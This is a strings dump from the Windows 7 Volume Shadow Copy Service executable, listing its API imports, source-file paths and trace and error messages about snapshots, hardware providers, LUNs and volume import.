vssvc.pdb
}.Ph8
~.Phl
QSSh8
PSSSSh
SSSSh
SSh$Cv
t.Whp
QSSSSh
u.jW3
%s<jW3
t.jW3
PSShH
PSSSSSSh
NtUnloadKey2
NtLoadKey2
WINDOWS
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
GetProcessHeap
_wcmdln
_amsg_exit
SHDeleteKeyW
ntdll.dll
ReportEventW
RegQueryInfoKeyW
GetSystemWindowsDirectoryW
AuthzReportSecurityEventFromParams
NtOpenKey
NtEnumerateKey
NtQueryKey
NtUnloadKey
NtLoadKey
NtCreateKey
NtDeleteValueKey
NtQueryValueKey
NtSetValueKey
NtDeleteKey
TCPAu2
Error loading operating system
Missing operating system
version="5.1.0.0"
name="Microsoft.Windows.VSSVC"
<requestedExecutionLevel
stdole2.tlbWWW
stdole2.tlbWWWx
#QueryVolumesSupportedForSnapshotsWWW
2 2$2(2,2024282
3,454;4@4
<!='=3=`=
4.545:5[5
6|7x7
353:3?3~3
>!>'>_>|>
2,2x2
44494>4{4
8#9)9/9[9
>,>2>7><>
4L4H4U4[4m4
\\?\Volume
d:\w7rtm\base\stor\vss\inc\vs_types.hxx
d:\w7rtm\base\stor\vss\modules\coord\src\svc.cxx
VSSVC: %s event received
RevokeInterfaceFromGlobal(%lu) [%0x08lx]
Run-time registration of service no longer supported.
Current token = '%s'
Trace: VSS command-line: '%s'
d:\w7rtm\base\stor\vss\modules\coord\inc\svc.hxx
\\?\GLOBALROOT
Returning BOOL: %s
GetVolumeNameForVolumeMountPointW succeeded and the output is %s
GetVolumeNameForVolumeMountPoint(%s,...) failed with error code 0xlx
GetVolumeNameForVolumeMountPointW will be called on %s
d:\w7rtm\base\stor\vss\inc\vs_vol.hxx
d:\w7rtm\base\stor\vss\modules\coord\src\coord.cxx
CVssCoordinator::IsVolumeSupported
CVssCoordinator::IsSnapshotRemote: service-machine = %s originating-machine = %s
GetVolumeNameForVolumeMountPoint(%s) failed with 0xlx
StringCchCopy(%s, %d, %s) failed
d:\w7rtm\base\stor\vss\inc\vs_str.hxx
IOCTL %lx succeeded on device %s - 0xlx.
IOCTL %lx failed on device %s - 0xlx. Error code = 0xlx
Could not send the IOCTL 0xlx on device %s - 0xlx. [0xlx]
DeviceIoControl(%s - %p,0xlx,%p,%d,%p,%d,[%d])
ResetEvent(m_overlapped.hEvent)
IOCTL sent: %lx on device %s
d:\w7rtm\base\stor\vss\inc\ichannel.hxx
IsVolumeSupportedInternal() failed with error code 0xlx
Volume not supported
Parameters: VolumeName = %s ProviderId = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} pSnapshotId = %p
must have a callback for a transportable snapshot
QueryRevertStatus(%s) returned success, but no Async object. It is assumed this interface is not implemented.
QueryRevertStatus(%s) returned error hr = 0xlx
Only Server supports transportable shadows
CVssCoordinator::ImportSnapshots
The server does not support transportable shadows
The client is not a backup operator
Reject resync operation
Either there's no supporting hardware provider, or the requestor didn't successfully add any volumes to the recovery set.
Requestor session {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} calls RecoverSet lock is %d, current session {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
ad:\w7rtm\base\stor\vss\inc\vs_list.hxx
The object '%s'. was opened under the device handle 0xlx
Could not open the object '%s'. [0xlx]
Error: the buffer is too small to fit %s (%d < %d)
CreateFileW(%s,0xlx,0xlx,...)
Error: the object name %s does terminate with a backslash
Opening a handle to %s (access = 0xlx, share = 0xlx)
Volume '%s' not found or not ready : NTSTATUS 0xlx
Encountered a read-only volume (%s), not supported by VSS
NtQueryVolumeInformationFile failed for volume %s, NTSTATUS 0xlx, NTSUCCESS %d, winerror 0xlx
Error calling CreateFile on volume '%s'
Encountered a non-fixed volumes (%s) - %ud, not supported by VSS
CVssCoordinator::VerifyVolumeIsSupportedByVSS
Invalid volume name %s
CreateFile(Volume %s)
Cannot ask provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} if volume is supported. [0xlx]
IVssSnapshotProvider::IsVolumeSupported() failed with 0xlx
Volume %s is too deeply nested
Volume %s not found
pbSupportedByThisProvider = %p
CVssCoordinator::IsVolumeSupportedInternal
Trying to mount on an unsupported medium
%s\%s
GetSnapshotProperties(SnapshotId, &pProp->Obj.Snap) => NULL Device
wszPathFromRoot = %s
wszExpose = %s
FSCTL_LOCK_VOLUME failed on volume %s
CreateFile(%s) failed with 0xlx
CVssCoordinator::IsSharedClusterVolume
NtQuerySystemInformation reports no pagefile
NtQuerySystemInformation failed with status %d
Provider id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} does not support IVssHardwareProviderEx
Resync to volume %s not supported.
No destination volume specified, so it was retrieved from the BCD. Cannonical form is %s
Destination volume specified as %s, cannonical form is %s
Requestor session {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} calls AddSnapshotToRecoverySet lock is %d, current session {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
This provider doesn't support revert
Revert is not supported on this volume
d:\w7rtm\base\stor\vss\modules\coord\src\admin.cxx
%s\%s\{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Error closing the hRegKeyVSS key. [0xlx]
Error closing the hRegKeyProviders key. [0xlx]
Error closing the hRegKeyNewProvider key. [0xlx]
Error closing the hRegKeyCLSID key. [0xlx]
RegSetValueExW(HKLM\%s\%s\%s\%s,%s,0,REG_SZ,%s.%d)
RegCreateKeyExW(HKLM\%s\%s\%s,%s,...)
RegSetValueExW(HKLM\%s\%s\%s,%s,0,REG_DWORD,%d,%d)
RegSetValueExW(HKLM\%s\%s\%s,%s,0,REG_SZ,%s.%d)
Provider with Id %s already registered
RegCreateKeyExW(HKLM\%s\%s,%s,...,[%d])
RegCreateKeyExW(HKLM\%s\%s,%s,...)
RegCreateKeyExW(HKLM\%s,%s,...)
RegCreateKeyExW(HKLM,%s,...)
pwszProviderVersion length greater than %d
invalid provider type %d
pwszProviderName length greater than %d
pwszProviderName = %s
eProviderType = %d
pwszProviderVersion = %s
SHDeleteKey(%p,%s)
d:\w7rtm\base\stor\vss\modules\coord\src\reg_util.cxx
RecursiveDeleteKey
Key with path %p\%s not found
%s: The value %s in the key with name %s has not a REG_SZ type. dwType == 0xlx
RegQueryValueExW(%s,%s,...)
%s: The value %s in the key with name %s has not a REG_DWORD type. dwType == 0xlx
d:\w7rtm\base\stor\vss\modules\coord\src\query.cxx
d:\w7rtm\base\stor\vss\inc\enum.hxx
Parameters: QueriedObjectId = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, eQueriedObjectType = %d, eReturnedObjectsType = %d, ppEnum = %p
Error closing the hKeyCLSID key. [0xlx]
Error closing the hKeyProvider key. [0xlx]
QueryDWORDValue(hProvider,%s,%s,%d)
RegOpenKeyExW(hKeyProviders,%s,KEY_READ,...)
CLSIDFromString(%s)
d:\w7rtm\base\stor\vss\modules\coord\src\provmgr.cxx
Error closing the hKeyProviders key. [0xlx]
Error on getting Provider properties for %s. [0xlx]
RegEnumKeyExW(HKLM\%s\%s,%s,%d,...)
RegOpenKeyExW(HKLM,%s\%s,0,KEY_ALL_ACCESS,&ptr)
Unexpected provider type %d
CVssProviderManager::QuerySupportedProvidersIntoArray
NetSharDel failed[0xlx]: Share parameter==%s
Share with name %s no longer points to snapshot %s.
NetShareGetInfo failed[%lu]: Share parameter==%s
d:\w7rtm\base\stor\vss\modules\coord\src\delete.cxx
Invalid type %d
DeleteSnapshots({%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, %d, %d, [%ld],[{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}]) failed
eSourceObjectType = %d
bForceDelete = %s plDeletedSnapshots = %p pNondeletedSnapshotID = %p
fBad state %d
ResumeThread failed. Error: 0xlx. State: %d
ResumeThread(%p) = -1, GetLastError() == 0xlx, m_eThreadState == %d
d:\w7rtm\base\stor\vss\inc\worker.hxx
d:\w7rtm\base\stor\vss\modules\coord\src\async.cxx
ImportSnapshots
Cancel called for operation not cancellable.
WaitForMultipleObjects(%p,%p, %d) == WAIT_FAILED, GetLastError() == 0xlx
Returning *pHrResult: 0xx
Internal ImportSnapshots failed. 0xlx
CVssAsync::DoImportSnapshots
d:\w7rtm\base\stor\vss\inc\vs_debug.hxx
WaitForSingleObject failed. Error: 0xlx. State: %d
WaitForSingleObject(%p,INFINITE) == WAIT_FAILED, GetLastError() == 0xlx, m_eThreadState == %d
d:\w7rtm\base\stor\vss\modules\coord\src\lovelace.cxx
Volume %s is assigned flush level %d
Volume %s is nested beyond the nested volume snapshot limit
Lovelace failed to hold writes at volume %d - '%s'
WaitForMultipleObjects(%d,%p,1,%d) == 0xlx
It took longer than %d seconds to send %d releases
Volume %s has a dependent volume %s that is already in the set
Nested volume %s has a parent volume %s that is already in the set
Lovelace(%s)
Bad state %d.
Current state %d. Reset to initializing
It took longer than %d seconds to flush %d volumes
Starting flush & hold on all volumes at level %d
timed out waiting for release writes to start for %s
WaitForSingleObject(%p,%d) == [0xlx]
timed out waiting for flush and hold to start for %s
The maximum number (%d) of Lovelace threads was reached.
It took longer than %d seconds to flush %d volumes
It took longer than %d seconds to open %d handles
Error starting the job %d [0xlx].
Error preparing the job %d [0xlx].
d:\w7rtm\base\stor\vss\modules\coord\src\provideroperation.cxx
CVssQueuedProviderOperation::OnFinish
CVssQueuedProviderOperation::OnTerminate
CVssQueuedProviderOperation::OnInit
CVssQueuedProviderOperation::OnCommitSnapshots
CVssQueuedProviderOperationList::WaitForFinish
bCVssQueuedProviderOperation::Initialize
CVssQueuedProviderOperation::OnRunCallback
CVssQueuedProviderOperationList::Reset
CVssQueuedProviderOperationList::PrepareToCommitSnapshots
CVssQueuedProviderOperationList::CommitSnapshots
CVssQueuedProviderOperation::ProviderOperationCallback
CVssQueuedProviderOperation::OnRun
CVssQueuedProviderOperationList::~CVssQueuedProviderOperationList
CVssQueuedProviderOperation::Initialize failed
CVssQueuedProviderOperationList::AddProviderOperation
Provider operation does not exist
CVssQueuedProviderOperationList::RemoveProviderOperation
]d:\w7rtm\base\stor\vss\modules\coord\src\snap_set.cxx
Fail to find client PID winerr %d HRESULT 0xlx
Freeze(%s,%d)
Abort(%s)
PrepareForSnapshot(%s,%s)
PostSnapshot(%s)
bIsDiskMaskPossible for ThawWriters = %s
bIsDiskMaskNeeded for ThawWriters = %s
Thaw(%s)
Volume %s not supported by any provider
Cannot convert volume name %s to a GUID
CVssSnapshotSetObject::GetSupportedProviderId
Fail to construct user account winerr %d HRESULT 0xlx
Fail to write to destination buffers winerr %d HRESULT 0xlx
Fail to find client process account winerr %d HRESULT 0xlx
Fail to convert client process token to sid string winerr %d HRESULT 0xlx
Converting 0xlx to VSS_E_NO_SNAPSHOTS_IMPORTED
Routine ImportSnapshotSet failed with 0xlx
Providers map loaded successfully - number of providers is: %d
CVssSnapshotSetObject::DoImportSnapshots
Fail resync operation
Warning: Error deleting the provider commit operation 0xlx
BeginPrepareSnapshot({%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x},{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x},%s)
Context %d not supported by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Volume %s has too many snapshots{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Volume %s not supported by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Error adding volume %s to the thread set. 0xlx
Volume %s not supported by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}in the context %ld
Transportable snapshot. Don't log on creation until import.
d:\w7rtm\base\stor\vss\modules\coord\src\mgmt.cxx
IVssSnapshotProvider::QueryVolumesSupportedForSnapshots(ProviderId,%ld,...)
CVssSnapshotMgmt::QueryVolumesSupportedForSnapshots
IVssSnapshotProvider::QuerySnapshotsByVolume(%s,...)
pwszVolumeName = %s
d:\w7rtm\base\stor\vss\modules\coord\src\callback.cxx
Error querying for the IDispatch interface. hr = 0xx
d:\w7rtm\base\stor\vss\modules\coord\src\softwrp.cxx
d:\w7rtm\base\stor\vss\modules\coord\src\hardwrp.cxx
CVssHardwareProviderWrapper::Initialize
CVssHardwareProviderWrapper::QueryInterface
CVssHardwareProviderWrapper::AddRef
CVssHardwareProviderWrapper::RevertToSnapshot
CVssHardwareProviderWrapper::QueryRevertStatus
CVssHardwareProviderWrapper::CheckContext
Cluster Node detection failed! [GetLastError() = %dL]
CVssHardwareProviderWrapper::CVssHardwareProviderWrapper
CVssHardwareProviderWrapper::QueryInternalInterface
CVssHardwareProviderWrapper::BuildSnapshotProperties
CVssHardwareProviderWrapper::FindSnapshotProperties
CVssHardwareProviderWrapper::EndPrepareSnapshots
CVssHardwareProviderWrapper::PreCommitSnapshots
CVssHardwareProviderWrapper::CommitSnapshots
CVssHardwareProviderWrapper::PostCommitSnapshots
DeletedSnapshots = %d
CVssHardwareProviderWrapper::AbortSnapshots
CVssHardwareProviderWrapper::OnLoad
CVssHardwareProviderWrapper::OnUnload
CVssHardwareProviderWrapper::HWDIAG_OnLoad
* PARAM IN: bForceUnload = %s
CVssHardwareProviderWrapper::HWDIAG_OnUnload
* PARAM OUT: bIsSupported = %lu (%s)
* RETURN: m_pHwPrv->AreLunsSupported() returned 0xlx
* CALL: m_pHwPrv->AreLunsSupported() ...
* PARAM IN: rgwszDevices[%d] = 0xlx
* PARAM IN: lLunCount = %d
CVssHardwareProviderWrapper::HWDIAG_AreLunsSupported
* PARAM IN: wszDeviceName = %s
CVssHardwareProviderWrapper::HWDIAG_FillInLunInfo
CVssHardwareProviderWrapper::HWDIAG_BeginPrepareSnapshot
* PARAM IN: rgwszDevices[%d] = %s
CVssHardwareProviderWrapper::HWDIAG_GetTargetLuns
CVssHardwareProviderWrapper::HWDIAG_LocateLuns
* PARAM IN: wszDevice = %s
CVssHardwareProviderWrapper::HWDIAG_OnLunEmpty
CVssHardwareProviderWrapper::HWDIAG_OnLunStateChange
CVssHardwareProviderWrapper::HWDIAG_EndPrepareSnapshots
CVssHardwareProviderWrapper::HWDIAG_PreCommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_CommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_PostCommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_AbortSnapshots
CVssHardwareProviderWrapper::HWDIAG_PreFinalCommitSnapshots
CVssHardwareProviderWrapper::HWDIAG_PostFinalCommitSnapshots
CVssHardwareProviderWrapper::AppendToGlobalList
CVssHardwareProviderWrapper::RemoveFromGlobalList
QI for IVssHardwareSnapshotProviderEx failed with %#x
CVssHardwareProviderWrapper::CreateInstance
BeginPrepareSnapshot({%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x},%s)
Context %d not supported on volume %s by provider {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
volume is not supported
IsVolumeSupported
CVssHardwareProviderWrapper::BeginPrepareSnapshot
Calling OnLunEmpty on LUN no %u after a post-export failure
OnLunEmpty for LUN no %u returned hr=0xlx
Calling OnLunEmpty on LUN no %u after a post-export cancel
PostSnapshots is prior to cleanup code: ft.hr=0xlx bGetTargetLunsSucceeded=%s cTotalLuns=%u
No snapshots were successfully imported for snapshot set {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
IVssHardwareSnapshotProvider::GetTargetLuns
CVssHardwareProviderWrapper::PostSnapshot
CVssHardwareProviderWrapper::GetSnapshotPropertiesInternal
CVssHardwareProviderWrapper::IsVolumeSnapshotted
CVssHardwareProviderWrapper::PreFinalCommitSnapshots
CVssHardwareProviderWrapper::PostFinalCommitSnapshots
CVssHardwareProviderWrapper::SetExposureProperties
Parameters: SnapshotId: {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, eSnapshotPropertyId = %d, vProperty = %s
Invalid variant %ul for property %d
Invalid property %d
CVssHardwareProviderWrapper::SetSnapshotProperty
IVssSnapshotSnapshotProvider::AreLunsSupported failed with error 0xlx
CVssHardwareProviderWrapper::IsVolumeSupported
CVssHardwareProviderWrapper::~CVssHardwareProviderWrapper
CVssHardwareProviderWrapper::Release
CVssHardwareProviderWrapper::EnumerateSnapshots
Parameters: QueriedObjectId = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}eQueriedObjectType = %d. eReturnedObjectsType = %d, ppEnum = %p
CVssHardwareProviderWrapper::Query
d:\w7rtm\base\stor\vss\modules\coord\src\rescan.cxx
CVssHardwareProviderWrapper::GetInterfaceDetailData
IOCTL_SCSI_RESCAN_BUS failed with error (%d)
Could not open channel to %s
Reenumerating devices on DEVINST %s...
CVssHardwareProviderWrapper::ReenumerateDevices
CVssHardwareProviderWrapper::DoRescanForDeviceChanges
%sSystem Volume Information\{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}.%s
System Volume Information\{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}.%s
{7cc467ef-6865-4831-853f-2a4817fd1bca}ALT
{7cc467ef-6865-4831-853f-2a4817fd1bca}DB
d:\w7rtm\base\stor\vss\modules\coord\src\hwwrpdb.cxx
CVssHardwareProviderWrapper::GetBootDrive
CVssHardwareProviderWrapper::MoveDatabase
CVssHardwareProviderWrapper::DeleteDatabase
CVssHardwareProviderWrapper::GetDatabasePath
%sSystem Volume Information
CVssHardwareProviderWrapper::CreateDataStore
CVssHardwareProviderWrapper::OpenDatabase
CVssHardwareProviderWrapper::OpenAlternateDatabase
CVssHardwareProviderWrapper::LoadData
CVssHardwareProviderWrapper::SaveData
CVssHardwareProviderWrapper::CheckLoaded
CVssHardwareProviderWrapper::TrySaveData
DefineDosDevice(%s, %s) [%ld]
Invalid device %s
d:\w7rtm\base\stor\vss\modules\coord\src\hwdelete.cxx
CVssHardwareProviderWrapper::SetDosDevice
CVssHardwareProviderWrapper::UninstallDevice
REBOOT required! devParams.Flags & (DI_NEEDRESTART | DI_NEEDREBOOT) [0xlx] device=(%s)
SetupDiGetDeviceInstallParams(DevInfo, DevInfoData, &devParams) - %s
Checking for reboot on removing/reinstalling device %s
CVssHardwareProviderWrapper::IsRebootRequired
CVssHardwareProviderWrapper::CheckAllSignaturesRevertable
OnLunStateChange(%s) failed with error 0x%8lx
OnLunEmpty(%s) failed with error 0x%8lx
IVssSnapshoProviderProvider::FillInLunInfo(%s) failed with error 0xlx
CVssHardwareProviderWrapper::NotifyDriveFree
Can't build LUN info for the volume %s. Ignoring.
Cannot notify legacy provider for '%s'
CVssHardwareProviderWrapper::NotifyVolumeOnReadWrite
Notifying hardware provider about lun being mounted %s for recovery
CVssHardwareProviderWrapper::NotifyVolumeOnRecovery
Fail to find a volume manager that supports the required dynamic disks
CVssHardwareProviderWrapper::BuildClosure
QueryDosDeviceW(%s) [%ld]
Symlink: %s...
Invalid device prefix %s
StringCbCopyW(%p,%d,%s)
Device found: %s...
CVssHardwareProviderWrapper::GetDosDevice
dNtCreateSymbolicLinkObject failed with status %d
CVssHardwareProviderWrapper::CreateSymbolicLinkW
Found volume device -- %s
SetupDiEnumDeviceInterfaces(devInfo, NULL, &, [%d], &)
Volume device path: %s
Get info on volume devnode %s...
CVssHardwareProviderWrapper::GetVolumeDevinfo
SetupDiGetDeviceRegistryProperty(devInfo, NULL, &, [%d], &)
Examining device %s
Get info on hidden volume devnode %s...
CVssHardwareProviderWrapper::GetHiddenVolumeDevinfo
GetVolumeNameForVolumeMountPoint(%s) fail with 0xlx
GetVolumeNameForVolumeMountPoint(%s) fails with 0xlx
GetVolumePathName(%s) failed with 0xlx
NetShareEnum failed with %d
GetVolumeNameForVolumeMountPoint(%s)
GetVolumePathNamesForVolumeName(%s) failed with 0xlx
CVssHardwareProviderWrapper::CollectSharesAndMountPointsOnVolume
Wait operation timed out without finding all hidden volumes, attempt %d.
IOCTL_DISK_SET_DISK_ATTRIBUTES fails to online %s
Signature for disk %s reverted
Could not revert the signature for disk %s
IOCTL_DISK_SET_DISK_ATTRIBUTES fails to offline %s
CVssHardwareProviderWrapper::ReOnlineDiskAndWaitForVolumeOnBreak
Decremented expected device count %d --> %d
GetVolumeNameForVolumeMountPoint(%s) fail on second time. with 0xlx. We cannot accept this volume
GetVolumeNameForVolumeMountPoint(%s) fails with 0xlx. We cannot accept this volume
Found new volume with matching disk id at path %s on local disk no %d. Ending wait.
Arrived volume %s disk id not matched with pre-reverted disk id. Continuing wait.
Fail to find HwSnapshotInfo for volume %s, disk no %d
Arrival of dynamic volume of %d extents. Ignoring.
CVssHardwareProviderWrapper::OnVolumeArrivalForBreak
NetShareAdd(%s, %s) failed with %d
NetShareDel(%s) failed with %d
Fail to restore all mount points for %s. [0lx]. Continuing.
SetVolumeMountPoint(%s, %s) fails with 0xlx
Fail to delete mount point %s for volume %s, winerror %d
GetVolumePathNamesForVolumeName(%s) fails with 0xlx
CVssHardwareProviderWrapper::RestoreSharesAndMountPointsOnVolume
CreateFile(%s) failed with [0xlx]
Opening snapshot device: %s ...
Getting snapshot with index %d...
- Deleted snapshot[%d] {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Checking if the disk %d is in use by other un-deleted snapshots in the set
CVssHardwareProviderWrapper::IsDiskUnused
CVssHardwareProviderWrapper::UninstallDisks
Dismount of RAW disk %s failed
Disk %s is not required to be deleted
Unable to get the disk number of %s
CVssHardwareProviderWrapper::OnDiskFoundForDelete
Decremented expected volmgr count %d --> %d
DiskClosureGuidsToDiskNumbers fails. [winerror %d]
IOCTL_VOLMGR_GET_CLOSURE fails. [winerror %d]
Checking volmgr %s
CVssHardwareProviderWrapper::OnVolmgrFoundForClosure
IOCTL_VOLMGR_SPLIT_DISKS fails. [winerror %d]
CVssHardwareProviderWrapper::SplitDisksFromSourceToTarget
CVssHardwareProviderWrapper::OfflineDynamicDisks
CreateSymbolicLink(%s,%s) failed
SetDosDevice(%s, %s) failed
GetDosDevice(%s) fails
DeviceIoControl(%s, IOCTL_VOLUME_ONLINE) fails: [0xlx]
CreateFile(%s) failed: [0xlx]
Disk %d still has snapshots on it
Uninstalling volume device: %s
Removing mount points from volume device %s
Failed to to dismount the volume: %s [0lx]
Failed to get the volume extents: %s [0lx]
Failed to open the volume: %s [0lx]
%s snapshot %s, %s
CVssHardwareProviderWrapper::ProcessDeletedVolume
CVssHardwareProviderWrapper::OperateDisksForBreakSnapshotSet
CVssHardwareProviderWrapper::InternalDeleteSnapshotSet
CVssHardwareProviderWrapper::InternalDeleteSnapshot
CVssHardwareProviderWrapper::BreakSnapshotSet
Force flag given but registry key SYSTEM\CurrentControlSet\Services\VSS\Settings, value name BlockSignatureRevert.
CVssHardwareProviderWrapper::BreakSnapshotSetEx
CVssHardwareProviderWrapper::DeleteAutoReleaseSnapshots
CVssHardwareProviderWrapper::DeleteSnapshotsInternal
ImportTimeoutScaleFactor
d:\w7rtm\base\stor\vss\modules\coord\src\hwimport.cxx
Error reading registry settings for the Import scale factor: 0xlx
scale factor: %u
CVssHardwareProviderWrapper::IsLunIdExpected
CVssHardwareProviderWrapper::DoRescan
Non-seqential extents that span Disk %d and Disk %d, whereas they appear sequentially on Disk %d for other volume.
Sequential extents on Disk %d are not sequential on other volume, they span Disk %d and Disk %d
CVssHardwareProviderWrapper::IsMatchingDiskExtents
CVssHardwareProviderWrapper::IsConflictingIdentifier
CVssHardwareProviderWrapper::DeleteLunMappingStructure
max total sleep time: %d
max retries: %d
Import fails because not all disks arrived in the system. Cannot online disks to get volumes.
- The Import will fail with VSS_E_NO_SNAPSHOTS_IMPORTED (0x80042320)
- PnP takes too much time to install/create the new disk devices. Look in setupapi.log
- Bug in the storage array: The disk shows as Read-Only (Read/Only LUNs are not supported by VSS HW infrastructure)
Wait operation timed out without exposing snapshotset, attempt %d.
CVssHardwareProviderWrapper::ExposeDisks
We find arrived disk %s has no LUN id and is not a snapshot disk arrival
Disk no %d
INFO: All disk devices for the volume (mapping index %d) are now exposed.
Arrived Disk %s does not have a matching LUN id Ignoring...
Arrived disk %s as inluded LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Disk %s is in state %d and has LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} and disk no %d
Can't to build Lun info for drive %s . Ignoring
%s - %s
%s disk found: %s
CVssHardwareProviderWrapper::OnDiskArrival
Volume at mapping index %d spans the same disk(s) as the arrived one but has different disk extents, volume is not matched.
Volume at mapping index %d doesn't span the same disks as the one that arrived
Not all disks for volume %s were expected. The volume is not matched and is ignored.
Volume %s spans disk %d with Lun id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} which is NOT included in the set of LUN ids expected to arrive.
Can't build LUN info for the %s hidden volume %s. Ignoring.
%s hidden volume %s found. Checking state of each extent
CVssHardwareProviderWrapper::OnHiddenVolumeArrival
Not all disks for volume %s were expected. The volume cannot be matched and is ignored.
Can't build LUN info for the %s volume %s. Ignoring.
%s volume %s found. Checking state of each extent
CVssHardwareProviderWrapper::OnVolumeArrival
CVssHardwareProviderWrapper::IsMatchPage80
Match found: ID1 = %d, ID2 = %d
CVssHardwareProviderWrapper::IsMatchDeviceIdDescriptor
CVssHardwareProviderWrapper::BuildVolumeMapping
Found volume name %s for device %s
INFO: Attempting to create a Volume Name for hidden volume device %s...
CVssHardwareProviderWrapper::WriteDeviceNames
CVssHardwareProviderWrapper::LogSecurityAuditsForProviderImport
Logging security audit for hardware snapshot import.
CVssHardwareProviderWrapper::IsMatchLun
BEGIN (Volume with mapping index %d)
CVssHardwareProviderWrapper::BuildLunMappingStructure
CVssHardwareProviderWrapper::RemoveUnexposedSnaphots
Decremented rundown from %d --> %d
Finding disks for pack %s
Found pack %s guid {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} to be the online pack
CVssHardwareProviderWrapper::OnVolmgrFoundForMergeOrSplit
CVssHardwareProviderWrapper::CheckForActiveTxfTransactionOnVolume
CVssHardwareProviderWrapper::OnlineDynamicDisks
GetVolumeInformation failed for volume index %d
TxF recovery failed: transaction flag is still active for volume %s
No TxF transaction on volume %s found
Active TxF transaction on volume %s found
Performing TxF recovery for volume #%ld %s
TxF recovery not supported for volume index %d
No TxF recovery needed for volume index %d
No explicit TxF recovery needed due to transportable import or implicit TxF recovery on autorecovery
CVssHardwareProviderWrapper::PerformTxfRecoveryOnVolumes
Import fails because not all hidden volumes arrived in the system. Cannot import snapshots.
Disk no %d with LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} and VDS_LUN_INFORMATION:
- Import will fail now with VSS_E_NO_SNAPSHOTS_IMPORTED (mapping index: %d)
ERROR: Volume (Mapping index %d) did not arrive in the system
volume[%u]->m_bImported = %s
volume[%u]->m_bExposed = %s
volume[%u]->m_wszDevice = %s
Wait operation timed out without finding all volumes, attempt %d.
Not all dynamic disks could be made online. Cannot import snapshots.
Found %u volumes in Pre or Snapshot state
CVssHardwareProviderWrapper::ExposeRecoveredVolumes
Hidden volume for mapping index %d did not arrive in the system, or it arrived as a non-hidden volume
Found %u volumes in either Check or Pre states.
CVssHardwareProviderWrapper::ExposeVolumes
CVssHardwareProviderWrapper::LocateAndExposeVolumes
Importing snapshots for Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
CVssHardwareProviderWrapper::ImportSnapshotSetInternal
d:\w7rtm\base\stor\vss\modules\coord\src\hwinst.cxx
CVssHardwareProviderInstance::QueryInterface
CVssHardwareProviderInstance::AddRef
CVssHardwareProviderInstance::SetContext
CVssHardwareProviderInstance::QueryInternalInterface
CVssHardwareProviderInstance::PreFinalCommitSnapshots
CVssHardwareProviderInstance::CreateInstance
CVssHardwareProviderInstance::Release
CVssHardwareProviderInstance::AddSnapshotSet
CVssHardwareProviderInstance::ImportSnapshotSet
CVssHardwareProviderInstance::BeginPrepareSnapshot
Returning string: %s
Invalid identifier buffer %d [%p, %p, %p]
Overlapping identifier %d [%p, %p, %p]
Invalid start pointer for identifier %d [%p, %p, %p %p]
Invalid STORAGE_DEVICE_ID_DESCRIPTOR structure. Integer overrun [%p, %p, %d]
d:\w7rtm\base\stor\vss\modules\coord\src\hwutils.cxx
CVssHardwareProviderWrapper::IsValidBuffer
Identifier %d is filtered out because of zero size (actually %d) or non-device association.
Integer overflow when building the VDS_STORAGE_IDENTIFIER structure. [%d]
CVssHardwareProviderWrapper::CopyStorageDeviceIdDescriptorToLun
CVssHardwareProviderWrapper::BuildStorageDeviceIdDescriptor
CVssHardwareProviderWrapper::CopySDString
CVssHardwareProviderWrapper::FreeLunInfo
CVssHardwareProviderWrapper::GetLocalComputerName
Device %s is a CD-ROM.
malloc failed to allocate a buffer size of %d
IOCTL_MOUNTDEV_QUERY_DEVICE_NAME failed on device %s
CVssHardwareProviderWrapper::IsDeviceCDRom
